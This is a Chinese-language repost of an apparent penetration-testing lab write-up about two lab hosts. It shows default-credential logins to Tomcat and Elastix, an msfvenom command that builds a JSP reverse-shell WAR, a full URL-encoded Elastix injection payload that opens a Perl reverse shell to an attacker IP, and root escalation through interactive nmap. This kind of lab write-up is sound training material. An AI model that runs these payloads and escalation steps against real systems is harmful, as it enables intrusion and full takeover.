栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

网络防御与学习-tomcat 默认密码利用

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

网络防御与学习-tomcat 默认密码利用

10.11.1.209 

Nikto 扫描得到:Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat. 

访问8080端口,找到后台登录地址,尝试tomcat tomcat 顺利登录后台。 

Apache Tomcat - Account Scanner / 'PUT' Request Command Execution - Multiple remote Exploit

https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/18619.zip

反弹shell,拿到root权限。cat /Desktop/proof.txt 

(未尝试的解法)msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.45 LPORT=1337 -f war > reverse.war 

10.11.1.217 

admin admin 进入后台,找到版本为2.2.0 sear…搜索Elastix 2.2.0 采用exploits/php/webapps/18650.py 

提取并修改代码为: 

https://10.11.1.217/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0Adata:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.11.0.101%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A

访问得到shell。按照18650.py中的说明: 

sudo nmap –interactive 

nmap> !sh 

id 

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) 

得到root权限。 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/439949.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号